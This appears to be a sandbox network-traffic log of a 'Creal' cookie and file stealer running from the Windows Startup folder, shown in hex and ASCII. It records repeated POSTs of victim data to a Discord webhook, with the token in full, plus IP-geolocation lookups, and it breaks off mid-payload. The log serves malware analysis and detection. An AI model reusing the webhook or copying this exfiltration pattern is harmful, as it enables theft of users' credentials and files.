"<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:17 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:17 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3e8eacae7cec11efb084ba898f4f55ff; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453958 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBe5Lo%2BZ9POrxFT%2BX8e%2Fr39FsO2uZnqiHDXXLCg6xr5nmLq%2F9zrH3I3Q7mE7SVR1F0zAxLZtuCr7ec80lKoNMSRPKQWPeodfuMkPFfLOnThAC755nhiWy9qxORN7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3e8eacae7cec11efb084ba898f4f55ffa348a94986f4ef5989f8f29c7c0361ba202c30265a26f83609f9c4341f6e938a; Expires=Wed, 26-Sep-2029 16:19:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=0a8884e8c86705b67a0572bb98a4aef4adcfb203-1727453957; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:17 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 67 76 6e 54 56 6c 6b 76 4d 77 55 69 50 4b 49 53 52 37 57 38 76 32 4c 50 42 44 50 36 33 47 7a 72 64 30 78 6b 36 4e 34 6e 35 6d 55 2d 31 37 32 37 34 35 33 39 35 37 35 36 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 32 33 65 61 62 37 63 62 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=gvnTVlkvMwUiPKISR7W8v2LPBDP63Gzrd0xk6N4n5mU-1727453957560-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0823eab7cb1-EWR
2024-09-27 16:19:17 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	49781	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:18 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:18 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:18 UTC	1363	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:18 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3ef7a3b27cec11efb7d86adb8ffda96a; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453959 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abr%2BUjwiujgyO3tgGe0ukf1vX6sSJOD0Z0pRX16NhBSAGQvuLnHfBSKYjOmJPBN0cw8V3p1PVK8osR7Zw6WIVCE2ovtL9oqCWMFP0bOovDkWl2pL%2BoDNGxJyQhwG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3ef7a3b27cec11efb7d86adb8ffda96ac79ebdd9ab702b83537aa31e2267ad1cdce4093222083a94b0278809b91f97f3; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:18 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 43 5a 73 41 4c 6d 6d 6c 72 35 78 74 6c 76 51 4b 55 63 57 6e 45 50 44 4c 77 38 6f 79 73 71 56 54 31 53 4d 65 4c 6c 4e 59 49 6f 30 2d 31 37 32 37 34 35 33 39 35 38 32 34 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 36 61 38 35 61 34 33 36 31 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=CZsALmmlr5xtlvQKUcWnEPDLw8oysqVT1SMeLlNYIo0-1727453958244-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd086a85a4361-EWR
2024-09-27 16:19:18 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	49782	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:18 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:18 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:18 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:18 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3f60d4367cec11efb6bfce5421a2957b; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453960 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bfo6%2BpLH0xBtM%2B3RP9OD0OaZKkyoBbtUyrkI4KEgiIhXoy21wwjPyPhaip6vsf2%2FbnRDSgw5JnzTlgkNCUGCeebPqP%2B8rICPNLGNP4t0M3mjl2S4bP9crLF9nFcv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3f60d4367cec11efb6bfce5421a2957bcfeeea4512cfa12521770092496e33566f10872398fd18bed539d53360ec53db; Expires=Wed, 26-Sep-2029 16:19:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=c387d6a5af5e9ff58e66aa3262890441f071e70d-1727453958; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:18 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 43 69 75 76 45 38 6c 69 76 48 76 4e 4e 63 57 51 30 66 5f 30 69 75 74 34 6f 4f 74 59 41 72 48 4c 71 61 6f 4e 78 78 4b 78 49 43 6f 2d 31 37 32 37 34 35 33 39 35 38 39 33 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 61 63 61 39 31 38 63 64 36 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=CiuvE8livHvNNcWQ0f_0iut4oOtYArHLqaoNxxKxICo-1727453958936-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd08aca918cd6-EWR
2024-09-27 16:19:18 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	49783	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:19 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:19 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:19 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:19 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3fcb19e07cec11efbb0972506fccbbd5; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453961 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CFlnKR2nBpAXtCrxQtK%2Bpf%2BMHsNlIZlHe8uyy43hvLsC0VLaCiG4p2D0NrlhpcR14RJ3XVwJMNGbijJvkbVG6mlKfKgrA4U1MmP968D%2BQdCRiI7os6sfD1hsrc21"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3fcb19e07cec11efbb0972506fccbbd52046978512bc3a3ff9e052d1d30ab1a6c95dea4efdeac673fad93551797fbe6d; Expires=Wed, 26-Sep-2029 16:19:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=e4739a2ca980cf72b6c40b39dd5676ede23582a9-1727453959; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:19 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 72 4b 6e 4d 5f 38 6a 47 6a 48 52 43 54 4d 62 79 61 61 2e 44 4e 52 2e 4e 63 48 30 65 55 5f 76 4a 46 70 78 6a 49 71 4b 31 6d 49 2d 31 37 32 37 34 35 33 39 35 39 36 33 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 38 66 33 66 65 38 38 63 61 35 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=QrKnM_8jGjHRCTMbyaa.DNR.NcH0eU_vJFpxjIqK1mI-1727453959633-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd08f3fe88ca5-EWR
2024-09-27 16:19:19 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	49784	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:20 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:20 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:20 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:20 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=402fc8fe7cec11ef81c93a45c6a02b6a; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453961 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqMEy1frYd0ukYO9EtMVw%2BsPqaLdhpbqcgjRQndVDBMlD5eejQ2PhVrmRBRAH1E%2FWJ1VCEzU2ok4RMCNbZEHYweiG%2BysPNKEOXoHnohl1bqdiF9hATknQzClundF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=402fc8fe7cec11ef81c93a45c6a02b6af1be99b918c971e3318b7f7702684800cab2e17a51b10f7d1029ef53d3341c53; Expires=Wed, 26-Sep-2029 16:19:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=2d2e75bff7344a90e4a667f73dabe89efa23a2ba-1727453960; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:20 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 6d 58 33 44 56 33 51 44 62 42 65 35 34 7a 73 58 4d 48 2e 38 59 45 44 58 53 38 33 51 55 63 56 78 52 64 56 4b 31 78 34 35 54 30 2d 31 37 32 37 34 35 33 39 36 30 32 39 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 39 33 36 64 33 33 33 33 34 65 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=QmX3DV3QDbBe54zsXMH.8YEDXS83QUcVxRdVK1x45T0-1727453960291-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0936d33334e-EWR
2024-09-27 16:19:20 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	49785	172.67.74.152	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:21 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:21 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:19:21 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9cd0990aac0f3a-EWR
2024-09-27 16:19:21 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	49786	159.89.102.253	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:22 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:22 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:19:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:19:22 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	49787	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:22 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:22 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user 